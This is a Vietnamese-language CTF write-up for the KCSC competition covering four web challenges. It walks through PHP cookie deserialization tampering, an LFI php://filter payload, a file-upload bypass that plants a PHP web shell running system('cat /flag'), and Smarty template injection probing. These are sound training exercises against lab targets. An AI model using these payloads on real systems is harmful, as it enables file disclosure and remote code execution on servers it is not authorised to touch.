KCSC wu - HackMD

# Pokemon Hof Panel Level 1 - Bài này cho mình hint deserialization vuln và source code có đoạn sau: ```php= if (isset($_COOKIE["trainer_data"])) { $base64Encoded = $_COOKIE["trainer_data"]; $serializedUser = base64_decode($base64Encoded); $user = unserialize($serializedUser); if (isChampion($user)) { $title = "Champion Pannel"; $msg = "Hello, " . $user->getname() . " KCSC{level1_fakeflag}"; } else { $title = "Trainer Pannel"; $msg = "Access denied. You are not a champion."; } } else { $title = "Something's wrong!!!"; $msg = "No trainer data found. Please choose your starter."; } ``` - Ta thấy nếu isChampion = 1 thì sẽ có flag. - Mình encode đoạn mã base64 ở cookie rồi thay đổi giá trị isChampion từ 0 -> 1 rồi decode về base64 sau đó ném vào cookie và f5 thì có flag. ##### Flag: `KCSC{n0w_y0u_kn0w_s3r1al1z3_f0m4rt}` # Mì tôm thanh long - Sau một hồi mày mò thì mình thấy đây là lfi wrapper vuln. - Mình test payload sau thì thấy đoạn mã base64. - Payload: `?page=php://filter/convert.base64-encode/resource=/var/www/html/pages/flag.php` Encrypt đoạn mã base64 thì ta thấy được flag. #### Flag: `KCSC{Lan_Dau_Tien_Trai_Thanh_Long_Co_Trong_KCSC:))}` # Apply To KCSC Trang web này yêu cầu mình tải file pdf lên nên mình nghĩ ngay tới file upload vuln. - Mình tạo một file a.pdf với hàm `phpinfo()` và upload lên sau đó đổi filename=a.php trong burp: ![](https://cdn.discordapp.com/attachments/1124588087931043891/1185979317470101634/image.png?ex=6591944f&is=657f1f4f&hm=d3ee53a8fcab5d2633c267fc0f0a6c720c5a0aadfc05d094cd15e82c2d8d30ea&) Ta nên test thử có RCE bằng hàm phpinfo() thay vì các hàm nguy hiểm như system(). Bởi rất có server chứa firewall, antivirus sẽ chặn không cho chạy các hàm nhạy cảm như vậy. ![](https://cdn.discordapp.com/attachments/1124588087931043891/1185977695411113994/image.png?ex=659192cc&is=657f1dcc&hm=147c6fc63fd1e43beaa34968969e4be3e046dc685a27719461c573853cef7530&) Vậy là đã thực hiện RCE thành công. - Giờ mình thay đổi nội dung file thành: ```php <?php system('ls / -la') ?> ``` - Ta thấy chạy được system() và nó trả về toàn bộ file và directory nằm ở thư mục root này. ![](https://cdn.discordapp.com/attachments/1124588087931043891/1185980490692432002/image.png?ex=65919567&is=657f2067&hm=d477db0ae85d32001279bda9aade26e4541049d1b818b6a1ada4f36e351be160&) ```php= <?php system('cat /flag') ?> ``` ##### Flag: `KCSC{W3lc0m3_T0_KCSC_2023____}` # Warmup PHP01 - Bài này cho mình biến name có thể thay đổi được và xuất ra trên web, mình thử test `?name={7*7}` thì kết quả xuất ra 49. Vậy là mình biết bài này có thể khai thác ssti được. - Mình check `/robots.txt` thì thấy có file `source` như sau: ```php= <?php include('flag1.php'); include('flag2.php'); include_once('/app/vendor/autoload.php'); define('FLAG1', $flag1); if(!isset($_GET['name'])) { header('Location: /?name=guest'); } if (isset($_GET['source'])) { show_source(__FILE__); } $smarty = new Smarty(); $policy = new Smarty_Security($smarty); if(str_starts_with($_GET['name'], 'kcsc')) { $policy->php_functions = $allow_php_func; } $smarty->enableSecurity($policy); $smarty->display('string:KCSC hello fen, '.$_GET['name']); KCSC hello fen, ``` - Ta thấy lớp Smarty_Security được thiết lập để giới hạn những gì mà một template có thể làm nên mình thử các pay load trên mạng đều không khai thác được nên ta phải đọc tài liệu về `Smarty PHP` https://smarty-php.github.io/smarty/4.x/designers/language-variables/language-variables-smarty/#smartyconst ![](https://cdn.discordapp.com/attachments/1124588087931043891/1187760152577835038/image.png?ex=65980ed7&is=658599d7&hm=c769eb7161ccc2a5a2c4446a4f9a483d895dbd40c9334345af894ac4b6bda392&) ![](https://cdn.discordapp.com/attachments/1124588087931043891/1187760541767307364/image.png?ex=65980f34&is=65859a34&hm=ca757ebb18b5de021627c1f147c0decf7ed2a952b78a77e864d2b3a4532ce424&) ##### Flag: ` KCSC{warmup01_begin_using_smarty}`